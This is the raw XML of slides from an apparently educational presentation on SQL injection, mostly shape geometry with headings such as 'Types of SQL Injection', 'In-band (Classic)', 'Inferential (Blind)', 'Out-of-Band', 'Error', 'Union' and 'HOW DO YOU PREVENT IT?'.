                  <a:lnTo>
                    <a:pt x="2132340" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111071" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088215" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063815" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037914" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010554" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981776" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951623" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920137" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887361" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853336" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818105" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781710" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744193" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705596" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665962" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625332" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583750" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541256" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497893" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453704" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408731" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363016" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316600" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269527" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221838" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173576" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124782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904856" y="4073593"/>
              <a:ext cx="1294201" cy="12916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5058987" y="6447418"/>
            <a:ext cx="2985135" cy="121920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39700" marR="5080" indent="-127635">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-370">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-550">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>YOU  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-570">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PREVENT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IT?</a:t>
            </a:r>
            <a:endParaRPr sz="4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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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4260833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260833" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426083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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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574959" y="6984237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59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434928" y="701488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59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32349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2954811" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158077" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or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96577" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="4096577" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4128010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2954810" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112889" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104830" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082389" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048170" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954810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28010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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n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962439" y="8927237"/>
            <a:ext cx="3176270" cy="1011555"/>
            <a:chOff x="7962439" y="8927237"/>
            <a:chExt cx="3176270" cy="1011555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7993872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2954800" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954800" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048180" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082405" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104850" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112910" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112910" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104850" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082405" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048180" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29548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993872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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
